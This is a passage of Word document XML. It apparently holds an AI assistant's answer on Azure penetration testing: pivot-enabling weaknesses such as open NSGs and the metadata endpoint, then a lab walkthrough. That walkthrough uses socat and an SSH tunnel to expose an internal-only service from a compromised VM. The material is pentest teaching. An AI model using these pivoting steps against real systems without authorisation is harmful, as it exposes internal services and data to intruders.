      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Internal Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E3A1FC" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>On your Kali machine, connect to the local forwarded port (e.g., localhost:1234) to interact with the previously inaccessible service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9F659" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Use browsers, curl, or proxy tools like Burp Suite to explore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC77D8" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00000000" w:rsidP="00FD1838">
      <w:r>
        <w:pict w14:anchorId="1CD86247">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E6631" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> What Vulnerabilities Enable Port Forwarding in Azure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F36600" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Misconfigured NSGs (Network Security Groups)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D0609" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Overly permissive rules that allow lateral movement or SSH/RDP from attacker-controlled sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD60CF" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Leakage or Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077C15C" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Access keys, secrets, or service principal credentials (e.g., from Managed Identity metadata endpoints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D41D04B" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Azure VM extensions or misconfigured storage accounts may leak credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0C057" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation on VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193F7D15" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Once you're inside a VM, local privilege escalation exploits may let you control the box and run port-forwarding tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE604D" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal-Only Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B1435D" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Azure services like internal APIs, databases (e.g., Cosmos DB, MySQL), or internal admin portals are often not exposed externally but reachable from internal VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02721504" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exposed Metadata Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CDFD7" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>The Azure instance metadata service (IMDS) at http://169.254.169.254 can be accessed from a compromised VM to fetch credentials if not properly secured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36442D73" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insufficient Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090665F" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Flat network architecture within a VNet or across peered VNets can allow access to otherwise isolated services once a single node is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB4434B" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00000000" w:rsidP="00FD1838">
      <w:r>
        <w:pict w14:anchorId="343F0580">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14868CF5" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA5E76" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve">Port forwarding allows you to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve"> deeper into Azure infrastructure and access sensitive internal services like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6684F9" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Internal dashboards or admin panels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44080F76" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0445F4E4" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Azure management endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD08C33" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Backup or configuration services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F2AEF" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve">It’s a key post-exploitation technique in cloud environments, especially where </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zero Trust or strong segmentation is not properly enforced</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F0BAF" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00000000" w:rsidP="00FD1838">
      <w:r>
        <w:pict w14:anchorId="70C2D2D1">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B011F7" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:r w:rsidRPr="00FD1838">
        <w:t>Would you like a step-by-step lab-style walkthrough using port forwarding in Azure with simulated vulnerable services?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079ECACF" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRDefault="00843CEA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6404B212" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRDefault="00843CEA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FCBC88" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Great! Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>step-by-step lab-style walkthrough</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> simulating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port forwarding scenario in an Azure penetration test</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>, including how you'd exploit it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9A67E" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="76E02901">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4F7A1"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Lab Scenario: Accessing an Internal Web Service via Port Forwarding in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CBCBF"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Lab Setup (Simulated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251BC62" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Kali Linux (local or cloud-hosted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4E300" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Ubuntu VM inside Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A756A50" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: A web dashboard running on 127.0.0.1:8080 on the Ubuntu VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C6DE1" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: You have a low-privilege shell on the Ubuntu VM (e.g., via reverse shell, SSH, or web shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71904360" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="1092117D">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4675B6A1"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Step 1: Confirm Access and Identify Internal Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC28F6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Once you're on the target VM, check open ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC4379" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> | grep LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E57E8E" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Example output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334E255" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">   0   0 127.0.0.1:8080   0.0.0.0:*   LISTEN   1234/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB9B11" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>You spot a web service only listening on 127.0.0.1:8080 — inaccessible externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D899E4" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="4EB5A148">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594B1F2"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Step 2: Set Up Port Forwarding with Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B5CE5" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Forward this service to an external-facing port (e.g., 1234) on the VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA777B6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>socat TCP-LISTEN:1234,fork,reuseaddr TCP:127.0.0.1:8080 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A855A3" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>You’ve now exposed the internal web service to port 1234 on the VM’s public IP (if accessible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA23DC" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> If the VM’s NSG (Network Security Group) allows inbound traffic to port 1234, you can access it from your Kali box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E7A01" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="28F91BD4">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B2BFE"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Step 3: Access the Service from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E36885" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>From your Kali machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D8776" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>curl http://&lt;public-ip-of-ubuntu-vm&gt;:1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2AF34" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Or open it in a browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF8491C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>http://&lt;public-ip&gt;:1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19B499" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>If successful, you’ll see the internal service that wasn’t accessible before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832547C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="77AD513B">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFD91C"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Step 4: (Optional) Use SSH Tunnel Instead (Safer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98EC9F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>If SSH access is available, create a secure tunnel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BA8DB7" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>ssh -L 9999:127.0.0.1:8080 user@&lt;ubuntu-vm-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB8C5C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Then on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA467F6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>curl http://localhost:9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35073C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="4F122DA2">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F634B7B"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Vulnerabilities That Made This Possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53A0DA" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal service not authenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – the dashboard is accessible without a login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664E85B6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Poor NSG configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – port 1234 was exposed to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C91FF" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lack of segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – internal-only services shouldn’t be reachable via port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929DFA4" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege abuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – even low-level users can run socat or open SSH tunnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56758818" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="076D7A98">
